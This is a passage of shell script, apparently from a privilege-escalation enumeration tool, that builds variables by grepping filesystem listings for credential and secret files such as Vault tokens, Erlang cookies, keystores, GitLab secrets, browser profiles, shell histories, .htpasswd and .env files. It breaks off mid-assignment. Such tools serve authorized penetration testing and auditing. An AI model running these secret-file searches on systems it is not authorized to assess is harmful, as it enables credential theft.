"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | 
grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/lib' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | 
grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_INFLUXDB=$(echo -e 